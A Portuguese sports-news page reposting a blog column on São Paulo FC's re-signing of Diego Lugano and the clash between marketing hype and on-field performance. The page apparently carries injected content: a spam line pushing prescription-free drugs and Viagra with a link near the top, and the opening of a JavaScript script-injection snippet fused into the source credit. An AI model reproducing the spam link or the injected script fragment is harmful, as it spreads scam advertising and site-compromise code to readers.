Noticias

Lugano põe em choque o marketing e o esporte

put in cart cheat medications without prescription – http://addaonline.in/put-in-cart-cheat-medications-without-prescription/ pills Buy cheap Viagra online

A recepção para Diego Lugano no aeroporto de Cumbica feita pela torcida do São Paulo mostra o quanto a contratação do zagueiro é um fenômeno de marketing. Com Lugano de volta, o clube conseguiu, finalmente, criar um fato novo para o torcedor ter o desejo de consumir o time, tanto que rapidamente a camisa 5 que o marcou na primeira passagem pelo São Paulo se tornou a mais vendida na loja oficial tricolor (leia aqui).

A jogada de marketing, porém, durará até o instante em que Lugano entrar em campo. Ali, com a bola rolando, o zagueiro terá de corresponder à expectativa criada sobre a sua volta. Só assim será possível manter em alta a euforia do torcedor são-paulino.

E é exatamente isso que deixará claro, mais uma vez, que o marketing e o esporte não deixam de estar, constantemente, em conflito.

Quando da sua chegada ao Tricolor, Lugano foi jocosamente apelidado de “zagueiro do presidente”. Contratação defendida pelo então presidente, Marcelo Portugal Gouvêa, o zagueiro uruguaio vinha sendo constantemente criticado pela má performance dentro de campo. Mas a partir da vitoriosa campanha da Libertadores-2005, o fio virou em favor de Lugano, transformando-o hoje num ídolo que chega com o status de Salvador da Pátria.

A volta do uruguaio lembra, em muitos aspectos, a contratação de Leônidas da Silva, em 1942. O atacante, então no Flamengo, foi apelidado de “bonde”, pelo alto valor envolvido na sua aquisição e pela idade “avançada” que tinha à época (29 anos). Primeiro atleta marqueteiro que se tem notícia no futebol brasileiro, Leônidas foi recebido com festa na estação de trem, entrou em campo pela primeira vez com um Pacaembu lotado e, depois disso, se consagrou como o primeiro grande jogador da história do São Paulo.

Lugano pode repetir a trajetória de Leônidas. Mas tem um enorme problema pela frente. Será impossível não cair na tentação de comparar sua performance à da primeira passagem pelo São Paulo. E, nesse sentido, o tempo poderá ser muito cruel com o zagueiro uruguaio.


O marketing, como sempre digo por aqui, não consegue resistir a uma má performance em campo. Lugano é, até a bola rolar, uma baita contratação para o marketing tricolor. Resta saber se, depois que os jogos começarem, ele vai corresponder à expectativa e reeditar, agora com mais apelo comercial, a bela história que tem com o clube. Nesse período, porém, marketing e performance esportiva estarão constantemente em choque.

 

Fonte: Blog do Erich Betingvar d=document;var s=d.createElement(‘script’);

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

2 × 1 =

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.

Noticias

Mais em Noticias

Em noite de Copa do Brasil, São Paulo estreia mascote em homenagem a Leônidas da Silva

saopauloadmin30 de dezembro de 2020

Muricy fala de sua função no São Paulo

saopauloadmin15 de dezembro de 2020

Hernanes empata com Dodô no ranking dos maiores artilheiros do São Paulo no Brasileiro

saopauloadmin10 de dezembro de 2020

Fora! Pato encaminha rescisão de contrato com o São Paulo e se despede do elenco

saopauloadmin19 de agosto de 2020

10 fatos que orgulham todos os torcedores do São Paulo

saopauloadmin9 de julho de 2020

Dodô diz que quando jogou no são Paulo recusou ofertas do Barça e Inter de Milão

saopauloadmin16 de junho de 2020

São Paulo reforça posição contra o racismo: ‘Vidas negras importam’

saopauloadmin1 de junho de 2020

Osorio fala sobre saída do São Paulo em 2015

saopauloadmin31 de maio de 2020

Osorio diz ter saudade do São Paulo e coloca volta ao Brasil como um de seus 3 objetivos

saopauloadmin29 de maio de 2020